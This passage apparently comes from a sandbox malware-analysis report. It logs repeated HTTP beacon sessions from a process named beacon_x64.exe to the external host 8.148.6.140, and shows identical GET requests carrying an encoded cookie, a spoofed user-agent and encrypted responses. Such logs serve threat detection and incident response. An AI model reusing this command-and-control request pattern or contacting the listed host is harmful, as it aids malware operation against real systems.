jSBcQRlCVmsgLK2UZfq7y0TqhehxFvCQb8ZdWd1Llll9WXVGcTeUgU0Z0s1yeVgsZtfVIxkjBEs+G1q1cCGbdkVjzsRyBhqLGhmF7osDc84b3Y6SS9pJ7ifrW6CoyAAVBLub1bC5H9GyU0LMhxvm6A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50022	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:13.669687033 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:14.632354975 CET	293	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:14 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 39 6d 4b 2f 72 2b 6b 62 4b 53 31 50 64 51 67 33 34 33 6c 51 7a 63 47 61 4e 6f 48 66 5a 66 70 56 69 53 73 37 49 6b 4f 30 39 6d 67 4f 48 62 4c 36 61 76 54 59 73 2b 54 65 44 66 49 55 79 6d 39 6c 33 56 43 38 37 39 4b 62 39 66 57 48 56 38 38 68 78 47 57 4b 43 42 44 77 35 34 6d 2f 69 32 46 71 67 47 33 6c 61 4b 72 44 56 53 59 3d Data Ascii: 9mK/r+kbKS1PdQg343lQzcGaNoHfZfpViSs7IkO09mgOHbL6avTYs+TeDfIUym9l3VC879Kb9fWHV88hxGWKCBDw54m/i2FqgG3laKrDVSY=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	50023	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:14.750066042 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:15.712852001 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:15 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:15.712863922 CET	364	IN	Data Raw: 61 34 76 4a 58 35 4a 78 50 43 38 38 6c 54 42 64 7a 6a 45 2f 35 41 74 31 43 32 58 39 35 36 34 6a 53 78 5a 2f 39 4c 64 54 57 62 48 58 30 6a 77 57 6e 4d 32 71 44 47 49 69 6e 48 37 55 77 68 74 4c 76 44 4b 33 2f 67 66 48 71 4f 64 43 72 6e 61 57 74 69 Data Ascii: a4vJX5JxPC88lTBdzjE/5At1C2X9564jSxZ/9LdTWbHX0jwWnM2qDGIinH7UwhtLvDK3/gfHqOdCrnaWtiBLlsLCFBSVWSo2JYhRVS2zC7X4yu2S2ojokp0WkJC9pAQGT4oTU06lyjP1UP0q/HzZR9XVLSfM5wiiOgroLPk9BSem5r/Ggg+Hhuo2M/GS3oc83nfetKmi/jPM0CBpirSAhoAYlmQhXAeNmT3d907qXb0ZP1fzEiy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.6	50024	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:15.841090918 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:16.835022926 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:16 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:16.835037947 CET	108	IN	Data Raw: 38 34 2f 31 68 35 71 6c 49 36 55 62 75 65 71 4f 39 7a 76 68 4e 56 44 32 4e 53 75 76 4b 64 63 52 51 51 51 70 75 47 70 72 70 42 74 4c 48 35 6d 63 6a 2b 4c 74 47 45 70 54 61 76 4d 55 46 58 48 66 45 4e 48 4c 31 73 38 6e 66 77 4a 57 44 66 38 37 42 2b Data Ascii: 84/1h5qlI6UbueqO9zvhNVD2NSuvKdcRQQQpuGprpBtLH5mcj+LtGEpTavMUFXHfENHL1s8nfwJWDf87B+P30UsMjwWDH5RGu4vQpW7MnFI=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	50025	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:16.975497961 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:17.947873116 CET	401	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:17 GMT Server: nginx Content-Length: 216 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 38 33 73 52 62 67 65 43 77 66 50 72 55 43 63 61 7a 63 32 76 4a 36 63 2b 76 7a 72 64 30 70 39 66 2b 74 4b 6d 51 59 79 69 49 35 58 6e 50 2b 38 2f 72 38 46 79 49 72 71 57 64 79 4f 64 34 42 71 49 2b 6f 47 49 57 6d 47 31 34 30 6b 70 52 74 6a 63 57 7a 4c 2b 32 34 50 55 2f 5a 2b 43 70 56 70 48 30 47 77 39 6f 36 47 62 7a 59 66 39 45 45 45 68 56 78 6a 79 71 7a 47 57 71 38 66 51 6d 4d 6f 52 54 38 39 6c 30 65 4a 74 4b 32 6b 69 51 6c 61 36 79 43 41 6f 4f 33 68 38 6c 58 4c 33 4a 4b 62 57 58 4a 6d 50 57 59 2b 31 34 55 31 49 65 42 49 41 4a 74 5a 50 6c 57 70 70 62 36 30 48 57 58 72 43 6e 52 32 4d 30 46 34 33 5a 54 51 37 31 6d 37 67 67 6b 46 41 37 77 3d 3d Data Ascii: 83sRbgeCwfPrUCcazc2vJ6c+vzrd0p9f+tKmQYyiI5XnP+8/r8FyIrqWdyOd4BqI+oGIWmG140kpRtjcWzL+24PU/Z+CpVpH0Gw9o6GbzYf9EEEhVxjyqzGWq8fQmMoRT89l0eJtK2kiQla6yCAoO3h8lXL3JKbWXJmPWY+14U1IeBIAJtZPlWppb60HWXrCnR2M0F43ZTQ71m7ggkFA7w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	50026	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:18.060146093 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:19.008219957 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:18 GMT Server: nginx Content-Length: 236 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:26:19.008289099 CET	236	IN	Data Raw: 31 74 4d 55 6f 56 49 30 68 64 30 6e 4b 46 2f 73 71 72 61 38 55 74 57 30 6e 49 55 32 51 54 48 30 72 4d 34 73 43 2b 4c 6b 33 42 4f 31 73 68 70 46 30 30 71 2f 68 42 59 61 66 6f 33 44 69 47 42 78 7a 42 66 6b 50 66 72 67 79 4a 68 64 4f 6a 53 4d 48 48 Data Ascii: 1tMUoVI0hd0nKF/sqra8UtW0nIU2QTH0rM4sC+Lk3BO1shpF00q/hBYafo3DiGBxzBfkPfrgyJhdOjSMHHAIG7B96KbfGs3sTmA57cz2ZB9HvJIojesHekXQQbtJA1kMgs+HKKo+9uppuQJ53CGNaPezEGuA4ize1vk086wLQiCYDfCUW1cikTNWuefbPywa1gCO6xyNtogcHIOnSoCwyvJm5nH95PEmjatvbBWtn+U=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	50027	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:19.124938011 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:20.067663908 CET	485	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:19 GMT Server: nginx Content-Length: 300 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6b 55 49 48 79 69 67 4e 4c 4d 49 49 41 4b 56 2b 58 5a 50 61 6e 61 44 55 5a 45 75 54 43 67 75 72 6b 4f 6f 50 70 57 45 58 75 75 2f 48 33 33 45 78 72 69 71 77 74 77 2f 55 61 52 36 6a 67 48 4b 35 54 4f 6f 70 2f 42 69 79 31 6d 36 69 43 34 53 57 79 74 62 4b 50 62 2b 52 35 57 6c 2f 55 6d 33 45 77 4e 41 46 78 49 33 37 41 74 53 45 4c 36 37 43 62 4c 2f 64 77 77 56 34 39 67 4d 35 6c 63 72 52 58 44 47 79 39 33 4e 71 6e 44 34 70 53 39 78 63 2f 61 46 41 47 76 79 4f 48 61 41 35 44 79 54 48 4e 42 2f 4d 52 35 4b 41 37 45 4f 75 53 6c 4b 64 2b 4d 34 52 4d 6f 43 6d 51 5a 4c 45 55 73 6b 74 58 38 42 69 4f 46 63 58 79 33 73 64 4c 42 51 41 61 2b 71 35 30 54 53 37 32 67 66 6f 68 4c 4f 54 46 76 46 79 6b 66 4c 39 49 50 59 4a 71 36 4a 6c 52 37 58 44 69 63 6f 54 70 33 49 4b 42 2f 67 4e 43 6b 58 74 6f 51 50 4b 74 75 7a 68 4b 59 37 4f 70 36 73 38 37 44 4a 35 35 4b 4c 6c 6c 73 36 4f 4a 65 64 43 57 78 71 65 68 2b 55 3d Data Ascii: kUIHyigNLMIIAKV+XZPanaDUZEuTCgurkOoPpWEXuu/H33Exriqwtw/UaR6jgHK5TOop/Biy1m6iC4SWytbKPb+R5Wl/Um3EwNAFxI37AtSEL67CbL/dwwV49gM5lcrRXDGy93NqnD4pS9xc/aFAGvyOHaA5DyTHNB/MR5KA7EOuSlKd+M4RMoCmQZLEUsktX8BiOFcXy3sdLBQAa+q50TS72gfohLOTFvFykfL9IPYJq6JlR7XDicoTp3IKB/gNCkXtoQPKtuzhKY7Op6s87DJ55KLlls6OJedCWxqeh+U=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.6	50028	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:20.236419916 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:21.747904062 CET	377	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:21 GMT Server: nginx Content-Length: 192 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 39 54 70 6c 31 4b 6d 7a 4c 61 4d 45 77 68 6f 50 4d 50 4b 67 6f 7a 75 78 65 42 41 68 4c 46 33 6f 4b 6f 33 6d 78 75 35 77 49 4d 2b 38 33 70 33 53 67 74 64 71 74 2f 78 2f 49 6f 77 64 77 6e 75 63 75 44 71 72 64 34 62 4d 6c 2f 6f 67 53 78 62 41 35 4d 2f 43 6c 43 4f 46 2b 79 69 7a 7a 4a 63 4b 50 61 5a 42 32 33 38 78 67 51 37 75 61 4c 33 6d 4d 2f 76 74 5a 49 41 6d 57 45 69 46 54 70 2b 55 73 58 73 42 78 73 63 47 4d 50 33 63 36 61 31 77 6a 4b 6f 77 32 75 51 56 74 55 39 4a 6c 2f 69 41 50 47 71 62 5a 36 38 39 4a 30 6e 71 6c 73 77 35 39 51 69 6b 5a 51 41 6c 44 57 61 76 41 63 4e 36 Data Ascii: 9Tpl1KmzLaMEwhoPMPKgozuxeBAhLF3oKo3mxu5wIM+83p3Sgtdqt/x/IowdwnucuDqrd4bMl/ogSxbA5M/ClCOF+yizzJcKPaZB238xgQ7uaL3mM/vtZIAmWEiFTp+UsXsBxscGMP3c6a1wjKow2uQVtU9Jl/iAPGqbZ689J0nqlsw59QikZQAlDWavAcN6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	50029	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:21.874087095 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:22.864389896 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:22 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 66 2f 48 51 42 6f 34 39 46 4f 53 51 72 41 55 73 4c 34 2b 7a 41 62 31 54 4f 76 78 62 5a 66 66 52 43 6d 51 6a 76 37 31 48 61 69 78 38 41 53 32 5a 36 45 76 53 51 39 71 42 55 41 67 57 31 76 77 6f 4e 79 41 41 69 6d 55 46 2f 32 32 51 75 72 49 50 46 4f 43 47 2f 6a 73 67 63 36 56 4d 66 4a 47 50 50 61 6b 6f 75 4a 42 32 71 6a 67 4c 33 4c 4e 54 34 64 5a 65 70 56 72 39 76 51 68 6e 42 69 6d 33 37 68 65 61 74 55 71 54 56 46 58 4f 67 64 51 7a 69 7a 53 53 63 4e 75 6a 57 5a 75 64 77 5a 4b 45 67 59 4c 41 6d 45 64 4c 64 77 6b 6d 34 6f 78 51 6b 63 4a 62 62 74 44 67 67 37 72 49 65 41 6f 36 63 71 6f 48 5a 71 70 71 64 4e 67 56 34 51 78 2b 55 48 76 49 57 70 55 6e 43 68 46 74 52 4e 43 79 44 76 7a 55 6e 74 48 4f 4a 56 37 62 48 32 6a 66 50 68 74 4f 59 4b 41 4f 73 6c 76 50 56 47 6d 4a 4e 38 34 53 61 68 42 53 56 43 79 57 30 48 6c 39 58 33 63 33 2b 62 34 66 70 4d 38 70 34 34 79 54 57 43 48 4f 34 71 6e 4a 6b 2f 73 31 79 51 31 45 65 54 39 67 4e 44 4b 6f 4b 52 68 54 43 71 70 44 54 55 70 61 31 71 48 63 54 70 5a 44 30 43 64 78 48 2b [TRUNCATED] Data Ascii: f/HQBo49FOSQrAUsL4+zAb1TOvxbZffRCmQjv71Haix8AS2Z6EvSQ9qBUAgW1vwoNyAAimUF/22QurIPFOCG/jsgc6VMfJGPPakouJB2qjgL3LNT4dZepVr9vQhnBim37heatUqTVFXOgdQzizSScNujWZudwZKEgYLAmEdLdwkm4oxQkcJbbtDgg7rIeAo6cqoHZqpqdNgV4Qx+UHvIWpUnChFtRNCyDvzUntHOJV7bH2jfPhtOYKAOslvPVGmJN84SahBSVCyW0Hl9X3c3+b4fpM8p44yTWCHO4qnJk/s1yQ1EeT9gNDKoKRhTCqpDTUpa1qHcTpZD0CdxH+xV+w==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	50030	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:23.079349995 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	50031	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:24.125369072 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:25.111063004 CET	505	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:24 GMT Server: nginx Content-Length: 320 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 78 71 36 69 67 36 50 6c 70 6c 2f 6c 61 48 73 45 6f 58 59 42 47 64 68 43 31 43 61 47 34 42 76 69 42 33 47 30 34 68 4c 2b 6b 42 6d 4c 46 31 4a 72 62 79 61 30 75 56 6a 4a 6e 36 72 49 74 35 46 70 6c 31 69 6f 55 46 2f 35 75 78 46 55 32 52 51 47 58 72 4a 67 50 49 79 79 6d 6a 70 39 49 37 79 2b 39 46 51 6f 33 67 38 74 4a 64 66 62 73 71 6e 75 4d 57 38 69 38 42 7a 63 46 4d 64 66 70 4d 7a 54 61 39 64 50 72 76 35 66 67 30 72 4e 69 35 36 54 57 48 6b 38 46 4a 4b 58 73 58 4e 42 52 4a 4e 6d 50 57 64 42 51 73 52 2f 7a 50 32 48 77 66 38 61 69 73 4f 31 57 77 4d 38 59 75 33 31 68 31 68 77 39 4d 6d 77 32 78 64 6b 33 45 6f 35 34 31 38 6f 38 44 32 34 6e 75 30 39 42 4b 50 35 41 30 48 44 31 53 46 64 6c 49 66 68 6e 7a 34 53 41 46 70 54 4e 31 75 4c 58 75 4d 41 6e 37 49 50 76 64 65 71 4b 38 69 72 54 71 44 4f 52 77 73 66 35 7a 57 55 4f 6b 56 50 30 51 53 6f 75 67 76 4a 6a 33 59 73 7a 7a 4d 31 51 73 4f 41 32 4d 6c 34 48 76 30 48 62 59 6e 42 4b 58 59 72 50 63 69 66 6f 73 57 47 Data Ascii: xq6ig6Plpl/laHsEoXYBGdhC1CaG4BviB3G04hL+kBmLF1Jrbya0uVjJn6rIt5Fpl1ioUF/5uxFU2RQGXrJgPIyymjp9I7y+9FQo3g8tJdfbsqnuMW8i8BzcFMdfpMzTa9dPrv5fg0rNi56TWHk8FJKXsXNBRJNmPWdBQsR/zP2Hwf8aisO1WwM8Yu31h1hw9Mmw2xdk3Eo5418o8D24nu09BKP5A0HD1SFdlIfhnz4SAFpTN1uLXuMAn7IPvdeqK8irTqDORwsf5zWUOkVP0QSougvJj3YszzM1QsOA2Ml4Hv0HbYnBKXYrPcifosWG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	50032	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:25.237972021 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:26:27.564515114 CET	549	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:26:27 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 2f 77 65 46 30 73 30 46 6e 55 56 39 43 62 68 69 7a 5a 52 42 36 66 31 53 66 52 6e 65 59 79 4e 6e 35 6e 61 4a 78 71 4a 33 69 2f 78 55 76 42 63 48 6d 74 49 50 79 4a 37 4c 78 4d 45 72 53 6c 41 70 56 31 47 7a 63 39 69 45 50 45 62 4b 61 58 41 5a 42 74 2f 78 79 62 4a 74 5a 47 62 5a 2b 76 53 2f 62 6c 55 62 44 65 54 43 48 74 41 65 47 5a 45 59 2b 41 42 59 6e 33 5a 78 39 4c 44 45 56 54 45 65 77 74 48 63 76 75 41 69 68 34 43 67 66 37 45 2f 6f 4c 6b 6a 7a 39 56 38 69 38 69 72 4e 2f 71 78 4b 6f 6d 67 66 6b 61 56 41 78 72 50 33 57 4d 49 75 4f 34 4a 78 37 4f 69 66 43 36 75 2f 4e 41 69 46 47 63 51 79 36 56 53 51 65 51 43 2f 42 32 79 43 43 75 6d 78 53 6b 6c 74 4c 74 41 76 2f 30 33 53 50 42 76 68 47 45 65 69 53 4d 33 4f 42 4b 51 61 6b 65 63 4e 56 58 65 67 2f 63 74 56 36 42 76 46 6e 4c 41 6e 7a 79 77 46 68 4f 50 63 39 4d 6e 30 6c 58 39 2b 78 78 64 4d 6f 33 34 74 71 54 69 73 45 4c 4e 41 78 4b 53 6e 37 6b 4a 6f 46 61 73 6d 36 32 30 34 5a 50 50 47 33 77 62 55 4f 70 35 4c 31 44 30 4d 77 79 44 58 45 5a 6d 45 46 48 77 30 47 [TRUNCATED] Data Ascii: /weF0s0FnUV9CbhizZRB6f1SfRneYyNn5naJxqJ3i/xUvBcHmtIPyJ7LxMErSlApV1Gzc9iEPEbKaXAZBt/xybJtZGbZ+vS/blUbDeTCHtAeGZEY+ABYn3Zx9LDEVTEewtHcvuAih4Cgf7E/oLkjz9V8i8irN/qxKomgfkaVAxrP3WMIuO4Jx7OifC6u/NAiFGcQy6VSQeQC/B2yCCumxSkltLtAv/03SPBvhGEeiSM3OBKQakecNVXeg/ctV6BvFnLAnzywFhOPc9Mn0lX9+xxdMo34tqTisELNAxKSn7kJoFasm6204ZPPG3wbUOp5L1D0MwyDXEZmEFHw0G21CU54YBmynuMdnLxqfB6wsl0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	50033	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:26:27.688795090 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
